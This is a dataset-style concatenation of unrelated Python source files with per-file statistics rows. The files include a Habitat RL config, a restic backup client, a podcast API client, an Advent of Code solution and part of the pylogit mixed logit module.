_C.RL.AUX_TASKS.TemporalDistanceTask.num_pairs = 1 # in lieu of subsample rate
_C.RL.AUX_TASKS.TemporalReachTask = CN()
_C.RL.AUX_TASKS.TemporalReachTask.loss_factor = 1.0
_C.RL.AUX_TASKS.TemporalReachTask.threshold = 10
_C.RL.AUX_TASKS.TemporalReachTask.num_pairs = 1
_C.RL.AUX_TASKS.ForwardDynamicsTask = CN()
_C.RL.AUX_TASKS.ForwardDynamicsTask.loss_factor = .0002
_C.RL.AUX_TASKS.ForwardDynamicsTask.subsample_rate = 0.1
_C.RL.AUX_TASKS.CPCA_Single = CN()
_C.RL.AUX_TASKS.CPCA_Single.loss_factor = 0.05
_C.RL.AUX_TASKS.CPCA_Single.num_steps = 8
_C.RL.AUX_TASKS.CPCA_Single.subsample_rate = 0.2
_C.RL.AUX_TASKS.CPCA_Single_A = _C.RL.AUX_TASKS.CPCA_Single.clone()
_C.RL.AUX_TASKS.CPCA_Single_A.num_steps = 2
_C.RL.AUX_TASKS.CPCA_Single_B = _C.RL.AUX_TASKS.CPCA_Single.clone()
_C.RL.AUX_TASKS.CPCA_Single_B.num_steps = 4
_C.RL.AUX_TASKS.CPCA_Single_C = _C.RL.AUX_TASKS.CPCA_Single.clone()
_C.RL.AUX_TASKS.CPCA_Single_C.num_steps = 8
_C.RL.AUX_TASKS.CPCA_Single_D = _C.RL.AUX_TASKS.CPCA_Single.clone()
_C.RL.AUX_TASKS.CPCA_Single_D.num_steps = 16
_C.RL.AUX_TASKS.CPCA = CN()
_C.RL.AUX_TASKS.CPCA.loss_factor = 0.05
_C.RL.AUX_TASKS.CPCA.num_steps = 1
_C.RL.AUX_TASKS.CPCA.subsample_rate = 0.2
_C.RL.AUX_TASKS.CPCA_A = _C.RL.AUX_TASKS.CPCA.clone()
_C.RL.AUX_TASKS.CPCA_A.num_steps = 2
_C.RL.AUX_TASKS.CPCA_B = _C.RL.AUX_TASKS.CPCA.clone()
_C.RL.AUX_TASKS.CPCA_B.num_steps = 4
_C.RL.AUX_TASKS.CPCA_C = _C.RL.AUX_TASKS.CPCA.clone()
_C.RL.AUX_TASKS.CPCA_C.num_steps = 8
_C.RL.AUX_TASKS.CPCA_D = _C.RL.AUX_TASKS.CPCA.clone()
_C.RL.AUX_TASKS.CPCA_D.num_steps = 16
_C.RL.AUX_TASKS.CPCA_Weighted = CN()
_C.RL.AUX_TASKS.CPCA_Weighted.loss_factor = 0.05
_C.RL.AUX_TASKS.CPCA_Weighted.subsample_rate = 0.2
_C.RL.AUX_TASKS.GID = CN()
_C.RL.AUX_TASKS.GID.loss_factor = 0.2
_C.RL.AUX_TASKS.GID.num_steps = 4
_C.RL.AUX_TASKS.GID.subsample_rate = 0.2
_C.RL.AUX_TASKS.ActionDist = CN()
_C.RL.AUX_TASKS.ActionDist.loss_factor = 0.2
_C.RL.AUX_TASKS.ActionDist.num_steps = 4
_C.RL.AUX_TASKS.ActionDist.subsample_rate = 0.2
_C.RL.AUX_TASKS.ActionDist_A = _C.RL.AUX_TASKS.ActionDist.clone()
_C.RL.AUX_TASKS.ActionDist_A.num_steps = 2
_C.RL.AUX_TASKS.SensorPrediction = CN()
_C.RL.AUX_TASKS.SensorPrediction.loss_factor = 0.05
_C.RL.AUX_TASKS.SensorPrediction.subsample_rate = 0.2
_C.RL.AUX_TASKS.SensorPrediction.goal = "objectgoal"
_C.RL.AUX_TASKS.VisionContrastedSP = CN()
_C.RL.AUX_TASKS.VisionContrastedSP.loss_factor = 0.05
_C.RL.AUX_TASKS.VisionContrastedSP.subsample_rate = 0.2
_C.RL.AUX_TASKS.VisionContrastedSP.sensor = "semantic"
_C.RL.AUX_TASKS.Dummy = CN()
_C.RL.PPO.use_normalized_advantage = True
_C.RL.PPO.hidden_size = 512
# -----------------------------------------------------------------------------
# DECENTRALIZED DISTRIBUTED PROXIMAL POLICY OPTIMIZATION (DD-PPO)
# -----------------------------------------------------------------------------
_C.RL.DDPPO = CN()
_C.RL.DDPPO.sync_frac = 0.6
_C.RL.DDPPO.distrib_backend = "GLOO"
_C.RL.DDPPO.rnn_type = "LSTM"
_C.RL.DDPPO.num_recurrent_layers = 2
_C.RL.DDPPO.backbone = "resnet50"
_C.RL.DDPPO.pretrained_weights = "data/ddppo-models/gibson-2plus-resnet50.pth"
# Loads pretrained weights
_C.RL.DDPPO.pretrained = False
# Loads just the visual encoder backbone weights
_C.RL.DDPPO.pretrained_encoder = False
# Whether or not the visual encoder backbone will be trained
_C.RL.DDPPO.train_encoder = True
# Whether or not to reset the critic linear layer
_C.RL.DDPPO.reset_critic = True
# -----------------------------------------------------------------------------
# ORBSLAM2 BASELINE
# -----------------------------------------------------------------------------
_C.ORBSLAM2 = CN()
_C.ORBSLAM2.SLAM_VOCAB_PATH = "habitat_baselines/slambased/data/ORBvoc.txt"
_C.ORBSLAM2.SLAM_SETTINGS_PATH = (
"habitat_baselines/slambased/data/mp3d3_small1k.yaml"
)
_C.ORBSLAM2.MAP_CELL_SIZE = 0.1
_C.ORBSLAM2.MAP_SIZE = 40
_C.ORBSLAM2.CAMERA_HEIGHT = get_task_config().SIMULATOR.DEPTH_SENSOR.POSITION[
1
]
_C.ORBSLAM2.BETA = 100
_C.ORBSLAM2.H_OBSTACLE_MIN = 0.3 * _C.ORBSLAM2.CAMERA_HEIGHT
_C.ORBSLAM2.H_OBSTACLE_MAX = 1.0 * _C.ORBSLAM2.CAMERA_HEIGHT
_C.ORBSLAM2.D_OBSTACLE_MIN = 0.1
_C.ORBSLAM2.D_OBSTACLE_MAX = 4.0
_C.ORBSLAM2.PREPROCESS_MAP = True
_C.ORBSLAM2.MIN_PTS_IN_OBSTACLE = (
get_task_config().SIMULATOR.DEPTH_SENSOR.WIDTH / 2.0
)
_C.ORBSLAM2.ANGLE_TH = float(np.deg2rad(15))
_C.ORBSLAM2.DIST_REACHED_TH = 0.15
_C.ORBSLAM2.NEXT_WAYPOINT_TH = 0.5
_C.ORBSLAM2.NUM_ACTIONS = 3
_C.ORBSLAM2.DIST_TO_STOP = 0.05
_C.ORBSLAM2.PLANNER_MAX_STEPS = 500
_C.ORBSLAM2.DEPTH_DENORM = get_task_config().SIMULATOR.DEPTH_SENSOR.MAX_DEPTH
def get_config(
config_paths: Optional[Union[List[str], str]] = None,
opts: Optional[list] = None,
) -> CN:
r"""Create a unified config with default values overwritten by values from
`config_paths` and overwritten by options from `opts`.
Args:
config_paths: List of config paths or string that contains comma
separated list of config paths.
opts: Config options (keys, values) in a list (e.g., passed from
command line into the config. For example, `opts = ['FOO.BAR',
0.5]`. Argument can be used for parameter sweeping or quick tests.
"""
config = _C.clone()
if config_paths:
if isinstance(config_paths, str):
if CONFIG_FILE_SEPARATOR in config_paths:
config_paths = config_paths.split(CONFIG_FILE_SEPARATOR)
else:
config_paths = [config_paths]
for config_path in config_paths:
config.merge_from_file(config_path)
if opts:
for k, v in zip(opts[0::2], opts[1::2]):
if k == "BASE_TASK_CONFIG_PATH":
config.BASE_TASK_CONFIG_PATH = v
config.TASK_CONFIG = get_task_config(config.BASE_TASK_CONFIG_PATH)
if opts:
config.CMD_TRAILING_OPTS = opts
config.merge_from_list(opts)
config.freeze()
return config
| 36.531136 | 108 | 0.684348 | 1,562 | 9,973 | 4.046095 | 0.214469 | 0.060759 | 0.076899 | 0.140981 | 0.446994 | 0.268671 | 0.205854 | 0.187184 | 0.137025 | 0.051899 | 0 | 0.024071 | 0.112704 | 9,973 | 272 | 109 | 36.665441 | 0.690134 | 0.227314 | 0 | 0.010101 | 0 | 0 | 0.057266 | 0.030664 | 0 | 0 | 0 | 0.003676 | 0 | 1 | 0.005051 | false | 0 | 0.020202 | 0 | 0.030303 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
415c300c1fc04be956dd24ffadcfc44181fd9b54 | 10,681 | py | Python | backup_client.py | evermind/restic-backupclient | 347fd6bfae0f967adac1b65775245f6e87a8c554 | [
"MIT"
] | null | null | null | backup_client.py | evermind/restic-backupclient | 347fd6bfae0f967adac1b65775245f6e87a8c554 | [
"MIT"
] | null | null | null | backup_client.py | evermind/restic-backupclient | 347fd6bfae0f967adac1b65775245f6e87a8c554 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from os import environ
import logging as log
import argparse
from crontab import CronTab
from datetime import datetime,timedelta
import time
import subprocess
import os.path
import re
import yaml
import shutil
import elasticdump
import mysqldump
import pgdump
import mongodump
import influxdump
def fail(msg,args):
log.error(msg,args)
quit(1)
def resolve_env_placeholders(template):
origTemplate = template
resolveDepth = 0
while resolveDepth < 10:
resolveDepth += 1
changed = False
for placeholder, key in re.findall('(\$\(([a-zA-Z0-9_-]+)\))', template):
if key in environ:
template = template.replace(placeholder, environ[key])
changed = True
if not changed:
break
return template
UNDEFINED=object()
def get_env(name,default=UNDEFINED):
if name in environ:
return resolve_env_placeholders(environ[name])
if default != UNDEFINED:
return default
fail('Please set the environment variable %s',name)
class ParseCronExpressions(argparse.Action):
def __init__(self, option_strings, dest, **kwargs):
super(ParseCronExpressions, self).__init__(option_strings, dest, **kwargs)
def __call__(self, parser, namespace, values, option_string=None):
items=[]
for value in values:
try:
items.append(CronTab(value))
except ValueError as e:
raise argparse.ArgumentError(self,'%s: %s'%(value,e))
setattr(namespace, self.dest, items)
def get_next_schedule(crontab):
now=datetime.now()
delay=-1
for cron in crontab:
cron_delay=cron.next(now,default_utc=False)
if delay<0 or cron_delay<delay:
delay=cron_delay
return now+timedelta(seconds=delay)
def load_config():
config_file=get_env('BACKUP_CONFIG',None)
if config_file is None:
return {}
if not os.path.exists(config_file):
log.error('Config does not exist: %s'%config_file)
try:
log.info('Using extra config from %s'%config_file)
with open(config_file,'r') as config:
return yaml.load(config)
except:
log.exception('Unable to read config file %s'%config_file)
return None
def run_pre_backup_script(scriptinfo):
if type(scriptinfo) is not dict:
log.error("Expected pre-backup-script to be a dict, got: %s",type(scriptinfo).__name__)
return False
if not 'script' in scriptinfo:
log.error("Pre-backup-script does not contain a 'script' property.")
return False
script=scriptinfo['script']
fail_on_error=bool(scriptinfo['fail-on-error']) if 'fail-on-error' in scriptinfo else True
description=("Executing pre-backup-script: %s"%scriptinfo['description']) if 'description' in scriptinfo else "Executing pre-backup-script"
log.info(description)
try:
subprocess.check_call(script,stderr=subprocess.STDOUT,shell=True)
log.info("Pre-backup-script succeeded")
except subprocess.CalledProcessError as e:
if (fail_on_error):
log.error("Pre-backup-script failed: %s",e)
return False
log.warning("Pre-backup-script failed: %s",e)
return True
def init_restic_repo():
log.info('Initializing repository')
try:
subprocess.check_output([
'restic',
'init'
],stderr=subprocess.STDOUT)
log.info('Repository initialized.')
except subprocess.CalledProcessError as e:
output=e.output.decode()
if 'repository master key and config already initialized' in output or 'config file already exists' in output:
log.info('Repository was already initialized.')
else:
log.error('Initializing repository failed: %s'%output)
return False
def run_backup():
backup_root=get_env('BACKUP_ROOT')
init_restic_repo()
config=load_config()
if config is None:
return False
if not (os.path.exists(backup_root)):
log.info('Backup mount point not found %s. Creating internal mount point for dump jobs. This might be ok if you only backup database dumps.'%backup_root)
os.mkdir(backup_root)
if 'pre-backup-scripts' in config:
for script in config['pre-backup-scripts']:
if not run_pre_backup_script(script):
log.error('Stopped due to pre-backup script failures')
return False
if 'elasticdump' in config:
elasticdump_dir=os.path.join(backup_root,'elasticdump')
try:
shutil.rmtree(elasticdump_dir)
except:
pass
if os.path.exists(elasticdump_dir):
log.error('Unable to delete old elasticdump dir at %s'%elasticdump_dir)
os.mkdir(elasticdump_dir)
log.info('Running elasticdump to %s'%elasticdump_dir)
elasticdump_ok=elasticdump.es_dump_with_config(elasticdump_dir,config['elasticdump'])
if not elasticdump_ok:
log.error('Elasticdump failed. Backup canceled.')
return False
if 'mysqldump' in config:
mysqldump_dir=os.path.join(backup_root,'mysqldump')
try:
shutil.rmtree(mysqldump_dir)
except:
pass
if os.path.exists(mysqldump_dir):
log.error('Unable to delete old mysqldump dir at %s'%mysqldump_dir)
os.mkdir(mysqldump_dir)
log.info('Running mysqldump to %s'%mysqldump_dir)
mysqldump_ok=mysqldump.mysql_dump_with_config(mysqldump_dir,config['mysqldump'])
if not mysqldump_ok:
log.error('Mysqldump failed. Backup canceled.')
return False
if 'pgdump' in config:
pgdump_dir=os.path.join(backup_root,'pgdump')
try:
shutil.rmtree(pgdump_dir)
except:
pass
if os.path.exists(pgdump_dir):
log.error('Unable to delete old pgdump dir at %s'%pgdump_dir)
os.mkdir(pgdump_dir)
log.info('Running pgdump to %s'%pgdump_dir)
pgdump_ok=pgdump.pg_dump_with_config(pgdump_dir,config['pgdump'])
if not pgdump_ok:
log.error('Pgdump failed. Backup canceled.')
return False
if 'mongodump' in config:
mongodump_dir=os.path.join(backup_root,'mongodump')
try:
shutil.rmtree(mongodump_dir)
except:
pass
if os.path.exists(mongodump_dir):
log.error('Unable to delete old mongodump dir at %s'%mongodump_dir)
os.mkdir(mongodump_dir)
log.info('Running mongodump to %s'%mongodump_dir)
mongodump_ok=mongodump.mongodump_with_config(mongodump_dir,config['mongodump'])
if not mongodump_ok:
log.error('Mongodump failed. Backup canceled.')
return False
if 'influxdump' in config:
influxdump_dir=os.path.join(backup_root,'influxdump')
try:
shutil.rmtree(influxdump_dir)
except:
pass
if os.path.exists(influxdump_dir):
log.error('Unable to delete old influxdump dir at %s'%influxdump_dir)
os.mkdir(influxdump_dir)
log.info('Running influxdump to %s'%influxdump_dir)
influxdump_ok=influxdump.influxdump_with_config(influxdump_dir,config['influxdump'])
if not influxdump_ok:
log.error('Influxdump failed. Backup canceled.')
return False
cmd=[
'nice','-n19',
'ionice','-c3',
'restic',
'backup',
'--host',get_env('BACKUP_HOSTNAME'),
]
# exclude caches (http://bford.info/cachedir/spec.html)
if not ('exclude-caches' in config and bool(config['exclude-caches'])):
cmd.append('--exclude-caches')
# ignore inode for changed-file checks (default is true)
if not ('ignore-inode' in config and bool(config['ignore-inode'])):
cmd.append('--ignore-inode')
# set cacheDir if not default one should be used
if ('cache-dir' in config ):
log.info("cache-dir is: "+config['cache-dir'])
cmd.append('--cache-dir')
cmd.append(config['cache-dir'])
# include files to backupset from given files
if 'include-from' in config:
includes=config['include-from']
if type(includes) is not list:
includes=[includes]
for include in includes:
log.info("Use include from: %s"%include)
cmd.append('--files-from')
cmd.append(include)
# exclude other files
if 'exclude' in config:
excludes=config['exclude']
if type(excludes) is not list:
excludes=[excludes]
for exclude in excludes:
log.info("Excluding: %s"%exclude)
cmd.append('--exclude')
cmd.append(exclude)
# if include is set no backuproot should given as argument
if 'include-from' not in config:
cmd.append(backup_root)
log.info('Starting backup')
try:
subprocess.check_call(cmd,stderr=subprocess.STDOUT)
log.info('Backup finished.')
except subprocess.CalledProcessError as e:
log.info('Backup failed.')
return False
clean_old_backups(config, True)
def clean_old_backups(config=None, prune = False):
if config is None:
# direct call, init first
config=load_config()
init_restic_repo()
if config is None:
return False
cleanup_command=[
'restic',
'forget',
'--prune'
]
if 'keep' in config:
keep=config['keep']
keep_is_valid=False
for keep_type in ['last','hourly','daily','weekly','monthly','yearly']:
if keep_type in keep:
keep_is_valid=True
cleanup_command+=['--keep-%s'%keep_type,str(keep[keep_type])]
if not keep_is_valid:
log.warn('Keep configuration is invalid - not deleting old backups.')
return
else:
keep_is_valid=False
for keep_type in ['last','hourly','daily','weekly','monthly','yearly']:
keep_env='KEEP_%s' % (keep_type.upper())
if keep_env in environ:
keep_is_valid=True
cleanup_command+=['--keep-%s'%keep_type,str(environ[keep_env])]
if not keep_is_valid:
log.warn('Rotation not configured. Keeping backups forever.')
return
log.info('Unlocking repository')
subprocess.check_call(['restic','unlock'],stderr=subprocess.STDOUT)
log.info('Deleting old backups')
try:
subprocess.check_call(cleanup_command,stderr=subprocess.STDOUT)
log.info('Backup finished.')
except subprocess.CalledProcessError as e:
log.warn('Cleanup failed!')
def schedule_backup(crontab):
while True:
next_schedule=get_next_schedule(crontab)
log.info('Scheduling next backup at %s'%next_schedule)
while True:
now=datetime.now()
if now>=next_schedule:
break
time.sleep(10)
try:
run_backup()
except:
log.exception("Something went unexpectedly wrong!")
def main():
log.basicConfig(level=log.INFO,format='%(asctime)s %(levelname)7s: %(message)s')
parser = argparse.ArgumentParser(description='Perform backups with restic')
subparsers = parser.add_subparsers(help='sub-command help',dest='cmd')
subparsers.required = True
parser_run = subparsers.add_parser('run', help='Run a backup now and rotate afterwards.')
parser_run = subparsers.add_parser('rotate', help='Rotate backups now.')
parser_schedule = subparsers.add_parser('schedule', help='Schedule backups.')
parser_schedule.add_argument('cronexpression',nargs='+',action=ParseCronExpressions,
help='Time to schedule the backup (cron expression, see https://pypi.org/project/crontab/)')
args=parser.parse_args()
get_env('RESTIC_REPOSITORY')
get_env('RESTIC_PASSWORD')
get_env('BACKUP_HOSTNAME')
get_env('BACKUP_ROOT')
if args.cmd=='run':
result=run_backup()
if not result:
quit(1)
if args.cmd=='rotate':
result=clean_old_backups(None, True)
if not result:
quit(1)
else:
schedule_backup(args.cronexpression)
if __name__ == '__main__':
main()
| 28.712366 | 155 | 0.735137 | 1,522 | 10,681 | 5.02431 | 0.187911 | 0.021054 | 0.019616 | 0.0085 | 0.185171 | 0.138355 | 0.099516 | 0.049954 | 0.049954 | 0.049954 | 0 | 0.001961 | 0.14053 | 10,681 | 371 | 156 | 28.789757 | 0.831046 | 0.030147 | 0 | 0.248387 | 0 | 0.003226 | 0.247416 | 0.002319 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041935 | false | 0.019355 | 0.051613 | 0 | 0.170968 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
415fd9ca7dc3dd7e0ad28f54f3222836570e36ec | 229 | py | Python | helpers/version.py | Dabalon/blues_bot.py | b153f65054ce973e16c5fd1e2061ce1fe50145d1 | [
"MIT"
] | 5 | 2020-01-05T18:53:20.000Z | 2022-03-19T13:01:24.000Z | helpers/version.py | Dabalon/blues_bot.py | b153f65054ce973e16c5fd1e2061ce1fe50145d1 | [
"MIT"
] | 22 | 2019-10-27T00:56:30.000Z | 2021-07-13T16:42:24.000Z | helpers/version.py | Dabalon/blues_bot.py | b153f65054ce973e16c5fd1e2061ce1fe50145d1 | [
"MIT"
] | 11 | 2020-01-05T18:53:22.000Z | 2022-03-30T22:20:13.000Z | # Version command helper
def get_version():
""" Opens version file and returns it as a string """
file = open("assets/version", "r")
ret = ''
for line in file:
ret += line
file.close()
return ret
| 20.818182 | 57 | 0.585153 | 31 | 229 | 4.290323 | 0.709677 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.292576 | 229 | 10 | 58 | 22.9 | 0.820988 | 0.305677 | 0 | 0 | 0 | 0 | 0.098684 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
416700a551016e3c3062ddbef52da0802e586ce3 | 1,849 | py | Python | podcastapi.py | rexxars/kodi-vg-podcasts | f5151b78717533e97a3d70439946654228adca70 | [
"MIT"
] | null | null | null | podcastapi.py | rexxars/kodi-vg-podcasts | f5151b78717533e97a3d70439946654228adca70 | [
"MIT"
] | null | null | null | podcastapi.py | rexxars/kodi-vg-podcasts | f5151b78717533e97a3d70439946654228adca70 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright (C) 2015-2016 Espen Hovlandsdal
from requests import Session
API_URL = 'http://api.vg.no/podcast';
session = Session()
session.headers['User-Agent'] = 'kodi-vg-podcasts'
session.headers['Accept'] = 'application/json'
class Base(object):
id = None
title = None
subtitle = None
thumb = None
logo = None
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
class Show(Base):
@staticmethod
def from_response(r):
return Show(
id=r['slug'],
title=r['name'],
subtitle=r['subtitle'],
logo=r['logo'],
thumb=r['logoThumb']
)
class Episode(Base):
duration = 0
media_url = None
year = 2015
@staticmethod
def from_response(r):
url = None
for attachment in r['attachments']:
if attachment['format'] == 'mp3':
url = attachment['url']
break
return Episode(
id=r['slug'],
title=r['title'],
subtitle=r['subtitle'],
logo=r['logo'],
thumb=r['logoThumb'],
year=get_year(r['pubDate']),
duration=parse_duration(r['duration']),
media_url=url
)
def shows():
return [Show.from_response(item) for item in _get('/shows.json')]
def episodes(slug):
items = _get('/' + slug + '.json')['episodes']
return [Episode.from_response(item) for item in items]
def parse_duration(dur):
parts = dur.split(':')
multiplier = 1
seconds = 0
for part in reversed(parts):
seconds += int(part) * multiplier
multiplier *= 60
return seconds
def get_year(date):
return int(date[:4])
def _get(path):
r = session.get(API_URL + path)
r.raise_for_status()
return r.json()
| 22.277108 | 69 | 0.559221 | 218 | 1,849 | 4.62844 | 0.389908 | 0.047572 | 0.037661 | 0.053518 | 0.212091 | 0.130823 | 0.081269 | 0.081269 | 0.081269 | 0 | 0 | 0.01542 | 0.29854 | 1,849 | 82 | 70 | 22.54878 | 0.762529 | 0.034072 | 0 | 0.15873 | 0 | 0 | 0.109428 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.126984 | false | 0 | 0.015873 | 0.047619 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
416ad546e81165ecbce7d3668b0084d159819a2c | 442 | py | Python | src/year2020/day05b.py | lancelote/advent_of_code | 06dda6ca034bc1e86addee7798bb9b2a34ff565b | [
"Unlicense"
] | 10 | 2017-12-11T17:54:52.000Z | 2021-12-09T20:16:30.000Z | src/year2020/day05b.py | lancelote/advent_of_code | 06dda6ca034bc1e86addee7798bb9b2a34ff565b | [
"Unlicense"
] | 260 | 2015-12-09T11:03:03.000Z | 2021-12-12T14:32:23.000Z | src/year2020/day05b.py | lancelote/advent_of_code | 06dda6ca034bc1e86addee7798bb9b2a34ff565b | [
"Unlicense"
] | null | null | null | """2020 - Day 5 Part 2: Binary Boarding."""
from src.year2020.day05a import process_data
def solve(task: str) -> int:
"""Find an empty seat."""
seats = process_data(task)
first = min(seats).pk
last = max(seats).pk
ideal = set(range(first, last))
real = set(seat.pk for seat in seats)
difference = ideal.difference(real)
assert len(difference), "difference is not a single seat"
return difference.pop()
| 26 | 61 | 0.658371 | 64 | 442 | 4.515625 | 0.6875 | 0.076125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.034483 | 0.21267 | 442 | 16 | 62 | 27.625 | 0.795977 | 0.128959 | 0 | 0 | 0 | 0 | 0.082888 | 0 | 0 | 0 | 0 | 0 | 0.1 | 1 | 0.1 | false | 0 | 0.1 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41716acd74ef124d89f5dce40e0eba84b378df21 | 43,180 | py | Python | src/pylogit/mixed_logit.py | mathijsvdv/pylogit | 2e7a06907d11b6fe02d3f3f9df91d374ed8a0c6d | [
"BSD-3-Clause"
] | 153 | 2016-03-22T05:52:41.000Z | 2022-02-09T13:33:20.000Z | src/pylogit/mixed_logit.py | mathijsvdv/pylogit | 2e7a06907d11b6fe02d3f3f9df91d374ed8a0c6d | [
"BSD-3-Clause"
] | 63 | 2016-03-22T05:47:56.000Z | 2021-12-23T12:01:29.000Z | src/pylogit/mixed_logit.py | mathijsvdv/pylogit | 2e7a06907d11b6fe02d3f3f9df91d374ed8a0c6d | [
"BSD-3-Clause"
] | 91 | 2016-05-27T06:04:38.000Z | 2022-03-13T20:00:15.000Z | # -*- coding: utf-8 -*-
"""
Created on Mon Jul 18 18:15:50 2016
@name: Mixed MultiNomial Logit
@author: Timothy Brathwaite
@summary: Contains functions necessary for estimating mixed multinomial logit
models (with the help of the "base_multinomial_cm.py" file).
Version 1 only works for MNL kernels and only for mixing of index
coefficients.
General References
------------------
Train, K., 2009. Discrete Choice Models With Simulation. 2 ed., Cambridge
University Press, New York, NY, USA.
"""
from __future__ import absolute_import
import warnings
import numpy as np
from scipy.sparse import csr_matrix
from . import base_multinomial_cm_v2 as base_mcm
from . import choice_calcs as cc
from . import mixed_logit_calcs as mlc
from .choice_tools import get_dataframe_from_data
from .choice_tools import create_design_matrix
from .choice_tools import create_long_form_mappings
from .display_names import model_type_to_display_name
from .estimation import EstimationObj
from .estimation import estimate
# Alias necessary functions for model estimation
general_calc_probabilities = cc.calc_probabilities
general_sequence_probs = mlc.calc_choice_sequence_probs
general_log_likelihood = mlc.calc_mixed_log_likelihood
general_gradient = mlc.calc_mixed_logit_gradient
general_bhhh = mlc.calc_bhhh_hessian_approximation_mixed_logit
_msg_1 = "The Mixed MNL Model has no shape parameters. "
_msg_2 = "shape_names and shape_ref_pos will be ignored if passed."
_shape_ignore_msg = _msg_1 + _msg_2
# Create a warning string that will be issued if ridge regression is performed.
_msg_3 = "NOTE: An L2-penalized regression is being performed. The "
_msg_4 = "reported standard errors and robust standard errors "
_msg_5 = "***WILL BE INCORRECT***."
_ridge_warning_msg = _msg_3 + _msg_4 + _msg_5
def split_param_vec(beta, return_all_types=False, *args, **kwargs):
"""
Parameters
----------
beta : 1D numpy array.
All elements should by ints, floats, or longs. Should have 1 element
for each utility coefficient being estimated (i.e. num_features).
return_all_types : bool, optional.
Determines whether or not a tuple of 4 elements will be returned (with
one element for the nest, shape, intercept, and index parameters for
this model). If False, a tuple of 3 elements will be returned, as
described below.
Returns
-------
tuple.
`(None, None, beta)`. This function is merely for compatibility with
the other choice model files.
Note
----
If `return_all_types == True` then the function will return a tuple of
`(None, None, None, beta)`. These values represent the nest, shape, outside
intercept, and index coefficients for the mixed logit model.
"""
if return_all_types:
return None, None, None, beta
else:
return None, None, beta
def mnl_utility_transform(sys_utility_array, *args, **kwargs):
"""
Parameters
----------
sys_utility_array : ndarray.
Should have 1D or 2D. Should have been created by the dot product of a
design matrix and an array of index coefficients.
Returns
-------
systematic_utilities : 2D ndarray.
The input systematic utilities. If `sys_utility_array` is 2D, then
`sys_utility_array` is returned. Else, returns
`sys_utility_array[:, None]`.
"""
# Return a 2D array of systematic utility values
if len(sys_utility_array.shape) == 1:
systematic_utilities = sys_utility_array[:, np.newaxis]
else:
systematic_utilities = sys_utility_array
return systematic_utilities
def check_length_of_init_values(design_3d, init_values):
"""
Ensures that the initial values are of the correct length, given the design
matrix that they will be dot-producted with. Raises a ValueError if that is
not the case, and provides a useful error message to users.
Parameters
----------
init_values : 1D ndarray.
1D numpy array of the initial values to start the optimizatin process
with. There should be one value for each index coefficient being
estimated.
design_3d : 2D ndarray.
2D numpy array with one row per observation per available alternative.
There should be one column per index coefficient being estimated. All
elements should be ints, floats, or longs.
Returns
-------
None.
"""
if init_values.shape[0] != design_3d.shape[2]:
msg_1 = "The initial values are of the wrong dimension. "
msg_2 = "They should be of dimension {}".format(design_3d.shape[2])
raise ValueError(msg_1 + msg_2)
return None
def add_mixl_specific_results_to_estimation_res(estimator, results_dict):
"""
Stores particular items in the results dictionary that are unique to mixed
logit-type models. In particular, this function calculates and adds
`sequence_probs` and `expanded_sequence_probs` to the results dictionary.
The `constrained_pos` object is also stored to the results_dict.
Parameters
----------
estimator : an instance of the MixedEstimator class.
Should contain a `choice_vector` attribute that is a 1D ndarray
representing the choices made for this model's dataset. Should also
contain a `rows_to_mixers` attribute that maps each row of the long
format data to a unit of observation that the mixing is being performed
over.
results_dict : dict.
This dictionary should be the dictionary returned from
scipy.optimize.minimize. In particular, it should have the following
`long_probs` key.
Returns
-------
results_dict.
"""
# Get the probability of each sequence of choices, given the draws
prob_res = mlc.calc_choice_sequence_probs(results_dict["long_probs"],
estimator.choice_vector,
estimator.rows_to_mixers,
return_type='all')
# Add the various items to the results_dict.
results_dict["simulated_sequence_probs"] = prob_res[0]
results_dict["expanded_sequence_probs"] = prob_res[1]
return results_dict
class MixedEstimator(EstimationObj):
"""
Estimation object for the Mixed Logit Model.
Parameters
----------
model_obj : a pylogit.base_multinomial_cm_v2.MNDC_Model instance.
Should contain the following attributes:
- alt_IDs
- choices
- design
- intercept_ref_position
- shape_ref_position
- utility_transform
- design_3d
mapping_res : dict.
Should contain the scipy sparse matrices that map the rows of the long
format dataframe to various other objects such as the available
alternatives, the unique observations, etc. The keys that it must have
are `['rows_to_obs', 'rows_to_alts', 'chosen_row_to_obs']`
ridge : int, float, long, or None.
Determines whether or not ridge regression is performed. If a
scalar is passed, then that scalar determines the ridge penalty for
the optimization. The scalar should be greater than or equal to
zero..
